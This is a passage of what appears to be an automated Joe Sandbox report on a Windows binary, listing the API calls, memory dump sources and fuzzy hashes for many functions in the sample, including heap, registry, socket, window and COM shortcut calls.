                                                • Instruction Fuzzy Hash: 8311B6B114011D7EEF118FA4CC85EEB7F5DFF59798F004111B618A6150C6729C61DBA4
                                                APIs
                                                  • Part of subcall function 0054D7A3: _free.LIBCMT ref: 0054D7CC
                                                • _free.LIBCMT ref: 0054D82D
                                                  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                • _free.LIBCMT ref: 0054D838
                                                • _free.LIBCMT ref: 0054D843
                                                • _free.LIBCMT ref: 0054D897
                                                • _free.LIBCMT ref: 0054D8A2
                                                • _free.LIBCMT ref: 0054D8AD
                                                • _free.LIBCMT ref: 0054D8B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                • Instruction ID: 417ec84ad38db8e74e8797b67926e58fb58d938e5b93832e5d11f6772c22c25f
                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                • Instruction Fuzzy Hash: 1B114F71540B15ABE921BFB1CC4BFCB7FFCBF80704F800825B29DA6192DA79B5454660
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0057DA74
                                                • LoadStringW.USER32(00000000), ref: 0057DA7B
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057DA91
                                                • LoadStringW.USER32(00000000), ref: 0057DA98
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057DADC
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 0057DAB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 4072794657-3128320259
                                                • Opcode ID: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
                                                • Instruction ID: 47a6e13620e782190c6b3c9374313eeff20332fda4825a87478aa119a98b56a1
                                                • Opcode Fuzzy Hash: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
                                                • Instruction Fuzzy Hash: 560167F25002087FEB10D7A49D89EEB3BBCFB05301F404456B709E2041E6749E849F74
                                                APIs
                                                • InterlockedExchange.KERNEL32(0157E9B8,0157E9B8), ref: 0058097B
                                                • EnterCriticalSection.KERNEL32(0157E998,00000000), ref: 0058098D
                                                • TerminateThread.KERNEL32(00000007,000001F6), ref: 0058099B
                                                • WaitForSingleObject.KERNEL32(00000007,000003E8), ref: 005809A9
                                                • CloseHandle.KERNEL32(00000007), ref: 005809B8
                                                • InterlockedExchange.KERNEL32(0157E9B8,000001F6), ref: 005809C8
                                                • LeaveCriticalSection.KERNEL32(0157E998), ref: 005809CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
                                                • Instruction ID: 0b7a1e224bf35d8a7f398d5ecd0e6b4f17d5088d86843c90ea5afdf2fb671657
                                                • Opcode Fuzzy Hash: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
                                                • Instruction Fuzzy Hash: 57F03C32542A02BBD7415FA4EE8CBE6BF39FF12702F402025F202A18A0CB749469DF90
                                                APIs
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00591DC0
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00591DE1
                                                • WSAGetLastError.WSOCK32 ref: 00591DF2
                                                • htons.WSOCK32(?,?,?,?,?), ref: 00591EDB
                                                • inet_ntoa.WSOCK32(?), ref: 00591E8C
                                                  • Part of subcall function 005739E8: _strlen.LIBCMT ref: 005739F2
                                                  • Part of subcall function 00593224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0058EC0C), ref: 00593240
                                                • _strlen.LIBCMT ref: 00591F35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                • String ID:
                                                • API String ID: 3203458085-0
                                                • Opcode ID: e16692b43dd7570cc3178c0393ca4c2c315be9796153ffbaab0d74ec2cd6b0bf
                                                • Instruction ID: f6c090ac83c268da4f1ecb23090663e86ae2e228c682cf52d9d3a2e99914afd1
                                                • Opcode Fuzzy Hash: e16692b43dd7570cc3178c0393ca4c2c315be9796153ffbaab0d74ec2cd6b0bf
                                                • Instruction Fuzzy Hash: 19B1ED31204712AFDB24DF24C889E6A7FA5BF85318F54894CF4564B2E2DB31ED82CB91
                                                APIs
                                                • __allrem.LIBCMT ref: 005400BA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005400D6
                                                • __allrem.LIBCMT ref: 005400ED
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054010B
                                                • __allrem.LIBCMT ref: 00540122
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00540140
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                • Instruction ID: 8e23473207f57ba74eec83dc3c1ed4eca54db54e1dc9b9ce217cb2f8d7501e95
                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                • Instruction Fuzzy Hash: B081F871A007069BE724AE39CC49BAB7FE9BF91328F24553AF951D76C1E770D9008B50
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005382D9,005382D9,?,?,?,0054644F,00000001,00000001,8BE85006), ref: 00546258
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0054644F,00000001,00000001,8BE85006,?,?,?), ref: 005462DE
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005463D8
                                                • __freea.LIBCMT ref: 005463E5
                                                  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                • __freea.LIBCMT ref: 005463EE
                                                • __freea.LIBCMT ref: 00546413
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
                                                • Instruction ID: 3fbf251d5f23bc9fb632ed8b9185025db5f5fafee3f0279a8ec4fe322b68717f
                                                • Opcode Fuzzy Hash: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
                                                • Instruction Fuzzy Hash: 5751DE72600256ABEB258E64DC85FEF7FA9FB86718F144A29F805D7190DB34DC40C6A1
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                  • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BCCA
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BD25
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0059BD6A
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0059BD99
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0059BDF3
                                                • RegCloseKey.ADVAPI32(?), ref: 0059BDFF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                • String ID:
                                                • API String ID: 1120388591-0
                                                • Opcode ID: 884fa420b0a8ffb9f1359db9e48005a25e23c0390b16d999c2e592ae6b24b825
                                                • Instruction ID: 2a9319274df48716c95288e4857821f2f203e22104ad1a171ec66022f79a0c6c
                                                • Opcode Fuzzy Hash: 884fa420b0a8ffb9f1359db9e48005a25e23c0390b16d999c2e592ae6b24b825
                                                • Instruction Fuzzy Hash: 7B819D30108242AFE714DF24D995E6ABFE9FF85308F14895CF4594B2A2DB31ED45CB92
                                                APIs
                                                • VariantInit.OLEAUT32(00000035), ref: 0056F7B9
                                                • SysAllocString.OLEAUT32(00000001), ref: 0056F860
                                                • VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F889
                                                • VariantClear.OLEAUT32(0056FA64), ref: 0056F8AD
                                                • VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F8B1
                                                • VariantClear.OLEAUT32(?), ref: 0056F8BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCopy$AllocInitString
                                                • String ID:
                                                • API String ID: 3859894641-0
                                                • Opcode ID: f817c579a5261397b4948ee04a2e17cf52ee271edbbce01a0ff72a991b5af2cd
                                                • Instruction ID: bd3130b51eb21b362942704d5d13f4857b70a6ea9e97e5f70fdf2f0b091cf2e1
                                                • Opcode Fuzzy Hash: f817c579a5261397b4948ee04a2e17cf52ee271edbbce01a0ff72a991b5af2cd
                                                • Instruction Fuzzy Hash: AA51C831E00311BBDF20AB65F899B69BFA9FF95310F245866E905DF291DB708C40C766
                                                APIs
                                                  • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 005894E5
                                                • _wcslen.LIBCMT ref: 00589506
                                                • _wcslen.LIBCMT ref: 0058952D
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00589585
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$FileName$OpenSave
                                                • String ID: X
                                                • API String ID: 83654149-3081909835
                                                • Opcode ID: 19390ebe71eea81c73e46538e88ebcf5df4d2ecad51e22a37f0245922fd46396
                                                • Instruction ID: 11df7cf4072da922e408185763d5ec414add65fba783ca5403043dd5de1535b1
                                                • Opcode Fuzzy Hash: 19390ebe71eea81c73e46538e88ebcf5df4d2ecad51e22a37f0245922fd46396
                                                • Instruction Fuzzy Hash: 51E1B5315043019FD714EF24C885AAEBBE4BFC5314F18896DF8999B2A2DB31ED45CB92
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                • BeginPaint.USER32(?,?,?), ref: 00529241
                                                • GetWindowRect.USER32(?,?), ref: 005292A5
                                                • ScreenToClient.USER32(?,?), ref: 005292C2
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005292D3
                                                • EndPaint.USER32(?,?,?,?,?), ref: 00529321
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005671EA
                                                  • Part of subcall function 00529339: BeginPath.GDI32(00000000), ref: 00529357
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                • String ID:
                                                • API String ID: 3050599898-0
                                                • Opcode ID: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
                                                • Instruction ID: 027379cd50156cfc62f615645239b1b77b58bb2120b6ee5cc23bfec4bf28e176
                                                • Opcode Fuzzy Hash: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
                                                • Instruction Fuzzy Hash: C1419F31104255AFD710DF24D884FBA7FA8FFAA724F140629F994CB2E2C7309849EB61
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0058080C
                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00580847
                                                • EnterCriticalSection.KERNEL32(?), ref: 00580863
                                                • LeaveCriticalSection.KERNEL32(?), ref: 005808DC
                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005808F3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00580921
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3368777196-0
                                                • Opcode ID: 07d0c3756413b901c071befae69357807687bdf318a6bf728e3e3d42e8ce51d8
                                                • Instruction ID: 4500ba0523c5062cea205dafcd198b214d5d59c943d0a2c7110aba8eaec8f3da
                                                • Opcode Fuzzy Hash: 07d0c3756413b901c071befae69357807687bdf318a6bf728e3e3d42e8ce51d8
                                                • Instruction Fuzzy Hash: 34415B71A00205EBDF55AF54EC85AAA7B78FF45310F1440B9ED00AA297DB30DE69DBA0
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0056F3AB,00000000,?,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 005A824C
                                                • EnableWindow.USER32(00000000,00000000), ref: 005A8272
                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 005A82D1
                                                • ShowWindow.USER32(00000000,00000004), ref: 005A82E5
                                                • EnableWindow.USER32(00000000,00000001), ref: 005A830B
                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005A832F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
                                                • Instruction ID: 1e32dd9f8b9f24350eac1461971b1f38191ecfe6c4d8894e7d7143417267ca4d
                                                • Opcode Fuzzy Hash: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
                                                • Instruction Fuzzy Hash: BC419F34601A44AFDF25CF14DC99BB87FE0BF5BB14F1851A9E6488F2A2CB31A845DB50
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00574C95
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00574CB2
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00574CEA
                                                • _wcslen.LIBCMT ref: 00574D08
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00574D10
                                                • _wcsstr.LIBVCRUNTIME ref: 00574D1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                • String ID:
                                                • API String ID: 72514467-0
                                                • Opcode ID: 2e4df6f285bfb62b9a26b2e4f3074fbfab9d1a377dd5210a4ed884099a2ceef4
                                                • Instruction ID: ea13f0270ee074d96add9a742b390796300102f201a5ab985024bad39e9a3012
                                                • Opcode Fuzzy Hash: 2e4df6f285bfb62b9a26b2e4f3074fbfab9d1a377dd5210a4ed884099a2ceef4
                                                • Instruction Fuzzy Hash: BD21DA31204111BBEB269B39BC49E7B7FACEF46750F108079F809CE191EB61DC00ABA0
                                                APIs
                                                  • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                • _wcslen.LIBCMT ref: 0058587B
                                                • CoInitialize.OLE32(00000000), ref: 00585995
                                                • CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 005859AE
                                                • CoUninitialize.OLE32 ref: 005859CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 3172280962-24824748
                                                • Opcode ID: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
                                                • Instruction ID: df1f498cf2d8dc26ba8d104b54e7ceb7076030961fc1a982c014677c50aa6180
                                                • Opcode Fuzzy Hash: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
                                                • Instruction Fuzzy Hash: 7DD155716046029FC714EF24C484A6ABBF6FF89715F14485DF88AAB361EB31EC45CB92
                                                APIs
                                                  • Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
                                                  • Part of subcall function 00570FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
                                                  • Part of subcall function 00570FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
                                                  • Part of subcall function 00570FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
                                                  • Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002
                                                • GetLengthSid.ADVAPI32(?,00000000,00571335), ref: 005717AE
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005717BA
                                                • HeapAlloc.KERNEL32(00000000), ref: 005717C1
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 005717DA
                                                • GetProcessHeap.KERNEL32(00000000,00000000,00571335), ref: 005717EE
                                                • HeapFree.KERNEL32(00000000), ref: 005717F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
